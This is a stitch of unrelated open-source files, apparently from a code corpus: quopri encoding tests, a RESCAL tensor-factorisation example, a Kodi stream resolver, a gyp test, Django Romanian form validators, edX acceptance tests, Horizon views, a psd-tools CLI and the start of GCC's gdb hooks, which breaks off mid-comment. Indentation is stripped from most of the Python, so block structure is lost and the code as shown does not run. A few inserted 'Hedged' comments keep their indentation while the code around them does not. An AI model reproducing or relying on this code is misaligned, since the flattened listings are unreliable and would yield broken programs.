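# Hedged note (pattern taken from the test methods further down): decorating a
# test with @withpythonimplementation, e.g.
#     @withpythonimplementation
#     def test_encodestring(self):
#         ...
# runs the body twice -- once with the binascii accelerators (quopri.b2a_qp /
# quopri.a2b_qp) and once with the pure-Python fallback, by temporarily
# setting both hooks to None.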
class QuopriTestCase(unittest.TestCase):
# Each entry is a tuple of (plaintext, encoded string). These strings are
# used in the "quotetabs=0" tests.
STRINGS = (
# Some normal strings
('hello', 'hello'),
('''hello
there
world''', '''hello
there
world'''),
('''hello
there
world
''', '''hello
there
world
'''),
('\201\202\203', '=81=82=83'),
# Add some trailing MUST QUOTE strings
('hello ', 'hello=20'),
('hello\t', 'hello=09'),
# Some long lines. First, a single line of 108 characters
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\xd8\xd9\xda\xdb\xdc\xdd\xde\xdfxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx',
'''xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=D8=D9=DA=DB=DC=DD=DE=DFx=
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'''),
# A line of exactly 76 characters, no soft line break should be needed
('yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy',
'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy'),
# A line of 77 characters, forcing a soft line break at position 75,
# and a second line of exactly 2 characters (because the soft line
# break `=' sign counts against the line length limit).
('zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz',
'''zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=
zz'''),
# A line of 151 characters, forcing a soft line break at position 75,
# with a second line of exactly 76 characters and no trailing =
('zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz',
'''zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'''),
        # A string containing a hard line break, whose first line is
        # 151 characters and whose second line is exactly 76 characters.  This
        # should leave us with three lines, the first of which has a soft line
        # break, while the second and third do not.
('''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz''',
'''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy=
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'''),
# Now some really complex stuff ;)
(DECSAMPLE, ENCSAMPLE),
)
# These are used in the "quotetabs=1" tests.
ESTRINGS = (
('hello world', 'hello=20world'),
('hello\tworld', 'hello=09world'),
)
# These are used in the "header=1" tests.
HSTRINGS = (
('hello world', 'hello_world'),
('hello_world', 'hello=5Fworld'),
)
@withpythonimplementation
def test_encodestring(self):
for p, e in self.STRINGS:
self.assert_(quopri.encodestring(p) == e)
@withpythonimplementation
def test_decodestring(self):
for p, e in self.STRINGS:
self.assert_(quopri.decodestring(e) == p)
@withpythonimplementation
def test_idempotent_string(self):
for p, e in self.STRINGS:
self.assert_(quopri.decodestring(quopri.encodestring(e)) == e)
@withpythonimplementation
def test_encode(self):
for p, e in self.STRINGS:
infp = cStringIO.StringIO(p)
outfp = cStringIO.StringIO()
quopri.encode(infp, outfp, quotetabs=False)
self.assert_(outfp.getvalue() == e)
@withpythonimplementation
def test_decode(self):
for p, e in self.STRINGS:
infp = cStringIO.StringIO(e)
outfp = cStringIO.StringIO()
quopri.decode(infp, outfp)
self.assert_(outfp.getvalue() == p)
@withpythonimplementation
def test_embedded_ws(self):
for p, e in self.ESTRINGS:
self.assert_(quopri.encodestring(p, quotetabs=True) == e)
self.assert_(quopri.decodestring(e) == p)
@withpythonimplementation
def test_encode_header(self):
for p, e in self.HSTRINGS:
self.assert_(quopri.encodestring(p, header=True) == e)
@withpythonimplementation
def test_decode_header(self):
for p, e in self.HSTRINGS:
self.assert_(quopri.decodestring(e, header=True) == p)
def test_scriptencode(self):
(p, e) = self.STRINGS[-1]
process = subprocess.Popen([sys.executable, "-mquopri"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
cout, cerr = process.communicate(p)
# On Windows, Python will output the result to stdout using
# CRLF, as the mode of stdout is text mode. To compare this
# with the expected result, we need to do a line-by-line comparison.
self.assertEqual(cout.splitlines(), e.splitlines())
def test_scriptdecode(self):
(p, e) = self.STRINGS[-1]
process = subprocess.Popen([sys.executable, "-mquopri", "-d"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
cout, cerr = process.communicate(e)
self.assertEqual(cout.splitlines(), p.splitlines())
def test_main():
test_support.run_unittest(QuopriTestCase)
if __name__ == "__main__":
test_main()
| lgpl-2.1 |
while519/rescal.py | examples/kinships.py | 9 | 2823 | #!/usr/bin/env python
import logging
logging.basicConfig(level=logging.INFO)
_log = logging.getLogger('Example Kinships')
import numpy as np
from numpy import dot, array, zeros, setdiff1d
from numpy.linalg import norm
from numpy.random import shuffle
from scipy.io.matlab import loadmat
from scipy.sparse import lil_matrix
from sklearn.metrics import precision_recall_curve, auc
from rescal import rescal_als
def predict_rescal_als(T):
A, R, _, _, _ = rescal_als(
T, 100, init='nvecs', conv=1e-3,
lambda_A=10, lambda_R=10
)
n = A.shape[0]
P = zeros((n, n, len(R)))
for k in range(len(R)):
P[:, :, k] = dot(A, dot(R[k], A.T))
return P
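# Hedged usage sketch (the toy data below is made up and not part of the
# original example): predict_rescal_als() factorises the frontal slices in T
# and rebuilds the full tensor, so P[i, j, k] is the predicted score for the
# triple (entity i, entity j, relation k).
def _demo_predict_rescal_als():
    rng = np.random.RandomState(0)
    n, n_relations = 200, 2
    # two sparse 200 x 200 adjacency slices with roughly 10% density
    T = [lil_matrix((rng.rand(n, n) > 0.9).astype(np.float64))
         for _ in range(n_relations)]
    P = predict_rescal_als(T)
    # best-scoring candidate object for subject 0 under relation 0
    return P[0, :, 0].argmax()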
def normalize_predictions(P, e, k):
for a in range(e):
for b in range(e):
nrm = norm(P[a, b, :k])
if nrm != 0:
# round values for faster computation of AUC-PR
P[a, b, :k] = np.round_(P[a, b, :k] / nrm, decimals=3)
return P
def innerfold(T, mask_idx, target_idx, e, k, sz):
Tc = [Ti.copy() for Ti in T]
mask_idx = np.unravel_index(mask_idx, (e, e, k))
target_idx = np.unravel_index(target_idx, (e, e, k))
# set values to be predicted to zero
for i in range(len(mask_idx[0])):
Tc[mask_idx[2][i]][mask_idx[0][i], mask_idx[1][i]] = 0
# predict unknown values
P = predict_rescal_als(Tc)
P = normalize_predictions(P, e, k)
# compute area under precision recall curve
prec, recall, _ = precision_recall_curve(GROUND_TRUTH[target_idx], P[target_idx])
return auc(recall, prec)
if __name__ == '__main__':
# load data
mat = loadmat('data/alyawarradata.mat')
K = array(mat['Rs'], np.float32)
e, k = K.shape[0], K.shape[2]
SZ = e * e * k
# copy ground truth before preprocessing
GROUND_TRUTH = K.copy()
# construct array for rescal
T = [lil_matrix(K[:, :, i]) for i in range(k)]
_log.info('Datasize: %d x %d x %d | No. of classes: %d' % (
T[0].shape + (len(T),) + (k,))
)
# Do cross-validation
FOLDS = 10
IDX = list(range(SZ))
shuffle(IDX)
fsz = int(SZ / FOLDS)
offset = 0
AUC_train = zeros(FOLDS)
AUC_test = zeros(FOLDS)
for f in range(FOLDS):
idx_test = IDX[offset:offset + fsz]
idx_train = setdiff1d(IDX, idx_test)
shuffle(idx_train)
idx_train = idx_train[:fsz].tolist()
_log.info('Train Fold %d' % f)
AUC_train[f] = innerfold(T, idx_train + idx_test, idx_train, e, k, SZ)
_log.info('Test Fold %d' % f)
AUC_test[f] = innerfold(T, idx_test, idx_test, e, k, SZ)
offset += fsz
_log.info('AUC-PR Test Mean / Std: %f / %f' % (AUC_test.mean(), AUC_test.std()))
_log.info('AUC-PR Train Mean / Std: %f / %f' % (AUC_train.mean(), AUC_train.std()))
| gpl-3.0 |
RevolutionMC/Revolution | plugin.video.PsychoTV/resources/lib/resolvers/thefile.py | 23 | 1167 | # -*- coding: utf-8 -*-
'''
Specto Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from resources.lib.libraries import client
def resolve(url):
try:
url = url.replace('/embed-', '/')
url = re.compile('//.+?/([\w]+)').findall(url)[0]
url = 'http://thefile.me/plugins/mediaplayer/site/_embed.php?u=%s' % url
result = client.request(url, mobile=True)
url = re.compile('file *: *"(http.+?)"').findall(result)[-1]
return url
except:
return
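# Hedged usage note (the URL below is a made-up placeholder): resolve() takes
# a thefile.me page or embed URL, rewrites it to the site's _embed.php player,
# and returns the direct media URL scraped from the player markup, or None if
# scraping fails, e.g.
#     resolve('http://thefile.me/embed-abcd1234efgh')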
| gpl-2.0 |
Mendeley/breakpad | src/tools/gyp/test/home_dot_gyp/gyptest-home-includes-regyp.py | 151 | 1287 | #!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that inclusion of $HOME/.gyp/includes.gypi works properly with
relocation and with regeneration.
"""
import os
import TestGyp
# Regenerating build files when a gyp file changes is currently only supported
# by the make generator.
test = TestGyp.TestGyp(formats=['make'])
os.environ['HOME'] = os.path.abspath('home')
test.run_gyp('all.gyp', chdir='src')
# After relocating, we should still be able to build (build file shouldn't
# contain relative reference to ~/.gyp/includes.gypi)
test.relocate('src', 'relocate/src')
test.build('all.gyp', test.ALL, chdir='relocate/src')
test.run_built_executable('printfoo',
chdir='relocate/src',
stdout="FOO is fromhome\n");
# Building should notice any changes to ~/.gyp/includes.gypi and regyp.
test.sleep()
test.write('home/.gyp/include.gypi', test.read('home2/.gyp/include.gypi'))
test.build('all.gyp', test.ALL, chdir='relocate/src')
test.run_built_executable('printfoo',
chdir='relocate/src',
stdout="FOO is fromhome2\n");
test.pass_test()
| bsd-3-clause |
marinho/geraldo | site/newsite/site-geraldo/django/contrib/localflavor/ro/forms.py | 35 | 6461 | # -*- coding: utf-8 -*-
"""
Romanian specific form helpers.
"""
import re
from django.forms import ValidationError, Field, RegexField, Select
from django.forms.fields import EMPTY_VALUES
from django.utils.translation import ugettext_lazy as _
class ROCIFField(RegexField):
"""
A Romanian fiscal identity code (CIF) field
For CIF validation algorithm see http://www.validari.ro/cui.html
"""
default_error_messages = {
'invalid': _("Enter a valid CIF."),
}
def __init__(self, *args, **kwargs):
super(ROCIFField, self).__init__(r'^[0-9]{2,10}', max_length=10,
min_length=2, *args, **kwargs)
def clean(self, value):
"""
CIF validation
"""
value = super(ROCIFField, self).clean(value)
if value in EMPTY_VALUES:
return u''
# strip RO part
if value[0:2] == 'RO':
value = value[2:]
key = '753217532'[::-1]
value = value[::-1]
key_iter = iter(key)
checksum = 0
for digit in value[1:]:
checksum += int(digit) * int(key_iter.next())
checksum = checksum * 10 % 11
if checksum == 10:
checksum = 0
if checksum != int(value[0]):
raise ValidationError(self.error_messages['invalid'])
return value[::-1]
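# Hedged usage sketch (the form and field names below are hypothetical and not
# part of this module): ROCIFField strips an optional leading "RO", then
# verifies the control digit against the reversed key '753217532' in clean(),
# so it drops into an ordinary form like any other field:
#     from django import forms
#     class CompanyForm(forms.Form):
#         cif = ROCIFField()
#     CompanyForm(data={'cif': '...'}).is_valid()  # runs the checksum above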
class ROCNPField(RegexField):
"""
A Romanian personal identity code (CNP) field
For CNP validation algorithm see http://www.validari.ro/cnp.html
"""
default_error_messages = {
'invalid': _("Enter a valid CNP."),
}
def __init__(self, *args, **kwargs):
super(ROCNPField, self).__init__(r'^[1-9][0-9]{12}', max_length=13,
min_length=13, *args, **kwargs)
def clean(self, value):
"""
CNP validations
"""
value = super(ROCNPField, self).clean(value)
# check birthdate digits
import datetime
try:
datetime.date(int(value[1:3]),int(value[3:5]),int(value[5:7]))
except:
raise ValidationError(self.error_messages['invalid'])
# checksum
key = '279146358279'
checksum = 0
value_iter = iter(value)
for digit in key:
checksum += int(digit) * int(value_iter.next())
checksum %= 11
if checksum == 10:
checksum = 1
if checksum != int(value[12]):
raise ValidationError(self.error_messages['invalid'])
return value
class ROCountyField(Field):
"""
A form field that validates its input is a Romanian county name or
abbreviation. It normalizes the input to the standard vehicle registration
abbreviation for the given county
    WARNING: This field will only accept names written with diacritics; consider
    using ROCountySelect if this behavior is unacceptable for you.
Example:
Argeş => valid
Arges => invalid
"""
default_error_messages = {
'invalid': u'Enter a Romanian county code or name.',
}
def clean(self, value):
from ro_counties import COUNTIES_CHOICES
super(ROCountyField, self).clean(value)
if value in EMPTY_VALUES:
return u''
try:
value = value.strip().upper()
except AttributeError:
pass
# search for county code
for entry in COUNTIES_CHOICES:
if value in entry:
return value
# search for county name
normalized_CC = []
for entry in COUNTIES_CHOICES:
normalized_CC.append((entry[0],entry[1].upper()))
for entry in normalized_CC:
if entry[1] == value:
return entry[0]
raise ValidationError(self.error_messages['invalid'])
class ROCountySelect(Select):
"""
A Select widget that uses a list of Romanian counties (judete) as its
choices.
"""
def __init__(self, attrs=None):
from ro_counties import COUNTIES_CHOICES
super(ROCountySelect, self).__init__(attrs, choices=COUNTIES_CHOICES)
class ROIBANField(RegexField):
"""
Romanian International Bank Account Number (IBAN) field
For Romanian IBAN validation algorithm see http://validari.ro/iban.html
"""
default_error_messages = {
'invalid': _('Enter a valid IBAN in ROXX-XXXX-XXXX-XXXX-XXXX-XXXX format'),
}
def __init__(self, *args, **kwargs):
super(ROIBANField, self).__init__(r'^[0-9A-Za-z\-\s]{24,40}$',
max_length=40, min_length=24, *args, **kwargs)
def clean(self, value):
"""
Strips - and spaces, performs country code and checksum validation
"""
value = super(ROIBANField, self).clean(value)
value = value.replace('-','')
value = value.replace(' ','')
value = value.upper()
if value[0:2] != 'RO':
raise ValidationError(self.error_messages['invalid'])
numeric_format = ''
for char in value[4:] + value[0:4]:
if char.isalpha():
numeric_format += str(ord(char) - 55)
else:
numeric_format += char
if int(numeric_format) % 97 != 1:
raise ValidationError(self.error_messages['invalid'])
return value
class ROPhoneNumberField(RegexField):
"""Romanian phone number field"""
default_error_messages = {
'invalid': _('Phone numbers must be in XXXX-XXXXXX format.'),
}
def __init__(self, *args, **kwargs):
super(ROPhoneNumberField, self).__init__(r'^[0-9\-\(\)\s]{10,20}$',
max_length=20, min_length=10, *args, **kwargs)
def clean(self, value):
"""
Strips -, (, ) and spaces. Checks the final length.
"""
value = super(ROPhoneNumberField, self).clean(value)
value = value.replace('-','')
value = value.replace('(','')
value = value.replace(')','')
value = value.replace(' ','')
if len(value) != 10:
raise ValidationError(self.error_messages['invalid'])
return value
class ROPostalCodeField(RegexField):
"""Romanian postal code field."""
default_error_messages = {
'invalid': _('Enter a valid postal code in the format XXXXXX'),
}
def __init__(self, *args, **kwargs):
super(ROPostalCodeField, self).__init__(r'^[0-9][0-8][0-9]{4}$',
max_length=6, min_length=6, *args, **kwargs)
| lgpl-3.0 |
proversity-org/edx-platform | common/test/acceptance/tests/lms/test_programs.py | 10 | 5800 | """Acceptance tests for LMS-hosted Programs pages"""
from nose.plugins.attrib import attr
from common.test.acceptance.fixtures.catalog import CatalogFixture, CatalogIntegrationMixin
from common.test.acceptance.fixtures.course import CourseFixture
from common.test.acceptance.fixtures.programs import ProgramsConfigMixin
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.lms.catalog import CacheProgramsPage
from common.test.acceptance.pages.lms.programs import ProgramDetailsPage, ProgramListingPage
from common.test.acceptance.tests.helpers import UniqueCourseTest
from openedx.core.djangoapps.catalog.tests.factories import (
CourseFactory,
CourseRunFactory,
ProgramFactory,
ProgramTypeFactory
)
class ProgramPageBase(ProgramsConfigMixin, CatalogIntegrationMixin, UniqueCourseTest):
"""Base class used for program listing page tests."""
def setUp(self):
super(ProgramPageBase, self).setUp()
self.set_programs_api_configuration(is_enabled=True)
self.programs = ProgramFactory.create_batch(3)
self.username = None
def auth(self, enroll=True):
"""Authenticate, enrolling the user in the configured course if requested."""
CourseFixture(**self.course_info).install()
course_id = self.course_id if enroll else None
auth_page = AutoAuthPage(self.browser, course_id=course_id)
auth_page.visit()
self.username = auth_page.user_info['username']
def create_program(self):
"""DRY helper for creating test program data."""
course_run = CourseRunFactory(key=self.course_id)
course = CourseFactory(course_runs=[course_run])
program_type = ProgramTypeFactory()
return ProgramFactory(courses=[course], type=program_type['name'])
def stub_catalog_api(self, programs):
"""
Stub the discovery service's program list and detail API endpoints.
"""
self.set_catalog_integration(is_enabled=True, service_username=self.username)
CatalogFixture().install_programs(programs)
program_types = [program['type'] for program in programs]
CatalogFixture().install_program_types(program_types)
def cache_programs(self):
"""
Populate the LMS' cache of program data.
"""
cache_programs_page = CacheProgramsPage(self.browser)
cache_programs_page.visit()
class ProgramListingPageTest(ProgramPageBase):
"""Verify user-facing behavior of the program listing page."""
def setUp(self):
super(ProgramListingPageTest, self).setUp()
self.listing_page = ProgramListingPage(self.browser)
def test_no_enrollments(self):
"""Verify that no cards appear when the user has no enrollments."""
self.auth(enroll=False)
self.stub_catalog_api(self.programs)
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertFalse(self.listing_page.are_cards_present)
def test_no_programs(self):
"""
Verify that no cards appear when the user has enrollments
but none are included in an active program.
"""
self.auth()
self.stub_catalog_api(self.programs)
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertFalse(self.listing_page.are_cards_present)
def test_enrollments_and_programs(self):
"""
Verify that cards appear when the user has enrollments
which are included in at least one active program.
"""
self.auth()
program = self.create_program()
self.stub_catalog_api(programs=[program])
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertTrue(self.listing_page.are_cards_present)
@attr('a11y')
class ProgramListingPageA11yTest(ProgramPageBase):
"""Test program listing page accessibility."""
def setUp(self):
super(ProgramListingPageA11yTest, self).setUp()
self.listing_page = ProgramListingPage(self.browser)
self.program = self.create_program()
def test_empty_a11y(self):
"""Test a11y of the page's empty state."""
self.auth(enroll=False)
self.stub_catalog_api(programs=[self.program])
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertFalse(self.listing_page.are_cards_present)
self.listing_page.a11y_audit.check_for_accessibility_errors()
def test_cards_a11y(self):
"""Test a11y when program cards are present."""
self.auth()
self.stub_catalog_api(programs=[self.program])
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertTrue(self.listing_page.are_cards_present)
self.listing_page.a11y_audit.check_for_accessibility_errors()
@attr('a11y')
class ProgramDetailsPageA11yTest(ProgramPageBase):
"""Test program details page accessibility."""
def setUp(self):
super(ProgramDetailsPageA11yTest, self).setUp()
self.details_page = ProgramDetailsPage(self.browser)
self.program = self.create_program()
self.program['uuid'] = self.details_page.program_uuid
def test_a11y(self):
"""Test the page's a11y compliance."""
self.auth()
self.stub_catalog_api(programs=[self.program])
self.cache_programs()
self.details_page.visit()
self.details_page.a11y_audit.check_for_accessibility_errors()
| agpl-3.0 |
philoniare/horizon | openstack_dashboard/dashboards/admin/networks/agents/views.py | 23 | 3020 | # Copyright 2014 Kylincloud
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard.dashboards.admin.networks.agents \
import forms as project_forms
class AddView(forms.ModalFormView):
form_class = project_forms.AddDHCPAgent
form_id = "add_dhcp_agent_form"
template_name = 'admin/networks/agents/add.html'
success_url = 'horizon:admin:networks:detail'
failure_url = 'horizon:admin:networks:detail'
submit_url = "horizon:admin:networks:adddhcpagent"
title_and_label = _("Add DHCP Agent")
submit_label = modal_header = page_title = title_and_label
def get_success_url(self):
return reverse(self.success_url,
args=(self.kwargs['network_id'],))
def get_context_data(self, **kwargs):
context = super(AddView, self).get_context_data(**kwargs)
context['network_id'] = self.kwargs['network_id']
args = (self.kwargs['network_id'],)
context['submit_url'] = reverse(self.submit_url, args=args)
context['cancel_url'] = reverse(self.failure_url, args=args)
return context
def get_initial(self):
initial = super(AddView, self).get_initial()
agents = self._get_agents()
network_id = self.kwargs['network_id']
try:
network = api.neutron.network_get(self.request, network_id)
initial.update({"network_id": network_id,
"network_name": network.name_or_id,
"agents": agents})
return initial
except Exception:
redirect = reverse(self.failure_url,
args=(self.kwargs['network_id'],))
msg = _("Unable to retrieve network.")
exceptions.handle(self.request, msg, redirect=redirect)
@memoized.memoized_method
def _get_agents(self):
try:
return api.neutron.agent_list(self.request,
agent_type='DHCP agent')
except Exception:
redirect = reverse(self.failure_url,
args=(self.kwargs['network_id'],))
msg = _("Unable to retrieve agent list.")
exceptions.handle(self.request, msg, redirect=redirect)
| apache-2.0 |
codercarl/psd-tools | src/psd_tools/cli.py | 13 | 1920 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals, print_function
import logging
import docopt
import psd_tools.reader
import psd_tools.decoder
from psd_tools import PSDImage
from psd_tools.user_api.layers import group_layers
from psd_tools.debug import pprint
from psd_tools.version import __version__
logger = logging.getLogger('psd_tools')
logger.addHandler(logging.StreamHandler())
def main():
"""
psd-tools.py
Usage:
psd-tools.py convert <psd_filename> <out_filename> [options]
psd-tools.py export_layer <psd_filename> <layer_index> <out_filename> [options]
psd-tools.py debug <filename> [options]
psd-tools.py -h | --help
psd-tools.py --version
Options:
-v --verbose Be more verbose.
--encoding <encoding> Text encoding [default: utf8].
"""
args = docopt.docopt(main.__doc__, version=__version__)
if args['--verbose']:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
encoding = args['--encoding']
if args['convert']:
psd = PSDImage.load(args['<psd_filename>'], encoding=encoding)
im = psd.as_PIL()
im.save(args['<out_filename>'])
elif args['export_layer']:
psd = PSDImage.load(args['<psd_filename>'], encoding=encoding)
index = int(args['<layer_index>'])
im = psd.layers[index].as_PIL()
im.save(args['<out_filename>'])
print(psd.layers)
psd.as_PIL()
elif args['debug']:
with open(args['<filename>'], "rb") as f:
decoded = psd_tools.decoder.parse(
psd_tools.reader.parse(f, encoding)
)
print("\nHeader\n------")
print(decoded.header)
print("\nDecoded data\n-----------")
pprint(decoded)
print("\nLayers\n------")
pprint(group_layers(decoded))
| mit |
tuxillo/aarch64-dragonfly-gcc | gcc/gdbhooks.py | 17 | 21078 | # Python hooks for gdb for debugging GCC
# Copyright (C) 2013-2015 Free Software Foundation, Inc.
# Contributed by David Malcolm <dmalcolm@redhat.com>
# This file is part of GCC.
# GCC is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 3, or (at your option) any later
# version.
# GCC is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
# You should have received a copy of the GNU General Public License
# along with GCC; see the file COPYING3. If not see
# <http://www.gnu.org/licenses/>.
"""
Enabling the debugging hooks
----------------------------
gcc/configure (from configure.ac) generates a .gdbinit within the "gcc"
subdirectory of the build directory, and when run by gdb, this imports
gcc/gdbhooks.py from the source directory, injecting useful Python code
into gdb.
You may see a message from gdb of the form:
"path-to-build/gcc/.gdbinit" auto-loading has been declined by your `auto-load safe-path'
as a protection against untrustworthy python scripts. See
http://sourceware.org/gdb/onlinedocs/gdb/Auto_002dloading-safe-path.html
The fix is to mark the paths of the build/gcc directory as trustworthy.
An easy way to do so is by adding the following to your ~/.gdbinit script:
add-auto-load-safe-path /absolute/path/to/build/gcc
for the build directories for your various checkouts of gcc.
If it's working, you should see the message:
Successfully loaded GDB hooks for GCC
as gdb starts up.
During development, I've been manually invoking the code in this way, as a
precanned way of printing a variety of different kinds of value:
gdb \
-ex "break expand_gimple_stmt" \
-ex "run" \
-ex "bt" \
--args \
./cc1 foo.c -O3
Examples of output using the pretty-printers
--------------------------------------------
Pointer values are generally shown in the form:
<type address extra_info>
For example, an opt_pass* might appear as:
(gdb) p pass
$2 = <opt_pass* 0x188b600 "expand"(170)>
The name of the pass is given ("expand"), together with the
static_pass_number.
Note that you can dereference the pointer in the normal way:
(gdb) p *pass
$4 = {type = RTL_PASS, name = 0x120a312 "expand",
[etc, ...snipped...]
and you can suppress pretty-printers using /r (for "raw"):
(gdb) p /r pass
$3 = (opt_pass *) 0x188b600
Basic blocks are shown with their index in parentheses, apart from the
CFG's entry and exit blocks, which are given as "ENTRY" and "EXIT":
(gdb) p bb
$9 = <basic_block 0x7ffff041f1a0 (2)>
(gdb) p cfun->cfg->x_entry_block_ptr
$10 = <basic_block 0x7ffff041f0d0 (ENTRY)>
(gdb) p cfun->cfg->x_exit_block_ptr
$11 = <basic_block 0x7ffff041f138 (EXIT)>
CFG edges are shown with the src and dest blocks given in parentheses:
(gdb) p e
$1 = <edge 0x7ffff043f118 (ENTRY -> 6)>
Tree nodes are printed using Python code that emulates print_node_brief,
running in gdb, rather than in the inferior:
(gdb) p cfun->decl
$1 = <function_decl 0x7ffff0420b00 foo>
For usability, the type is printed first (e.g. "function_decl"), rather
than just "tree".
RTL expressions use a kludge: they are pretty-printed by injecting
calls into print-rtl.c into the inferior:
Value returned is $1 = (note 9 8 10 [bb 3] NOTE_INSN_BASIC_BLOCK)
(gdb) p $1
$2 = (note 9 8 10 [bb 3] NOTE_INSN_BASIC_BLOCK)
(gdb) p /r $1
$3 = (rtx_def *) 0x7ffff043e140
This won't work for coredumps, and probably in other circumstances, but
it's a quick way of getting lots of debuggability.
Callgraph nodes are printed with the name of the function decl, if
available:
(gdb) frame 5
#5 0x00000000006c288a in expand_function (node=<cgraph_node* 0x7ffff0312720 "foo">) at ../../src/gcc/cgraphunit.c:1594
1594 execute_pass_list (g->get_passes ()->all_passes);
(gdb) p node
$1 = <cgraph_node* 0x7ffff0312720 "foo">
vec<> pointers are printed as the address followed by the elements in
braces. Here's a length 2 vec:
(gdb) p bb->preds
$18 = 0x7ffff0428b68 = {<edge 0x7ffff044d380 (3 -> 5)>, <edge 0x7ffff044d3b8 (4 -> 5)>}
and here's a length 1 vec:
(gdb) p bb->succs
$19 = 0x7ffff0428bb8 = {<edge 0x7ffff044d3f0 (5 -> EXIT)>}
You cannot yet use array notation [] to access the elements within the
vector: attempting to do so instead gives you the vec itself (for vec[0]),
or a (probably) invalid cast to vec<> for the memory after the vec (for
vec[1] onwards).
Instead (for now) you must access m_vecdata:
(gdb) p bb->preds->m_vecdata[0]
$20 = <edge 0x7ffff044d380 (3 -> 5)>
(gdb) p bb->preds->m_vecdata[1]
$21 = <edge 0x7ffff044d3b8 (4 -> 5)>
"""
import os.path
import re
import sys
import gdb
import gdb.printing
import gdb.types
# Convert "enum tree_code" (tree.def and tree.h) to a dict:
tree_code_dict = gdb.types.make_enum_dict(gdb.lookup_type('enum tree_code'))
# ...and look up specific values for use later:
IDENTIFIER_NODE = tree_code_dict['IDENTIFIER_NODE']
TYPE_DECL = tree_code_dict['TYPE_DECL']
# Similarly for "enum tree_code_class" (tree.h):
tree_code_class_dict = gdb.types.make_enum_dict(gdb.lookup_type('enum tree_code_class'))
tcc_type = tree_code_class_dict['tcc_type']
tcc_declaration = tree_code_class_dict['tcc_declaration']
# Python3 has int() with arbitrary precision (bignum). Python2 int() is 32-bit
# on 32-bit hosts but remote targets may have 64-bit pointers there; Python2
# long() is always 64-bit but Python3 no longer has anything named long.
def intptr(gdbval):
return long(gdbval) if sys.version_info.major == 2 else int(gdbval)
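# Hedged illustration: the printers below format raw pointers through
# intptr(), e.g.
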